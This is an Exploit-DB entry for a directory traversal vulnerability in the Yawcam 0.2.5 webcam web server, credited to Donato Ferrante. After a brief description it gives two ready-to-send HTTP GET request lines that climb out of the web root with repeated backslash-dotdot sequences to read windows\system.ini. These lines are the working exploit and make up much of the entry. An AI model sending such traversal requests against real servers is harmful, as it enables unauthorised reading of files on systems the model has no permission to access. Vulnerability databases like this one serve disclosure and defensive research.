yawcam 0.2.5 - Directory Traversal Vulnerability

2005-04-21T00:00:00
ID EDB-ID:25487
Type exploitdb
Reporter Donato Ferrante
Modified 2005-04-21T00:00:00

Description

Yawcam 0.2.5 Directory Traversal Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/13295/info

Yawcam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

GET ..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0

GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0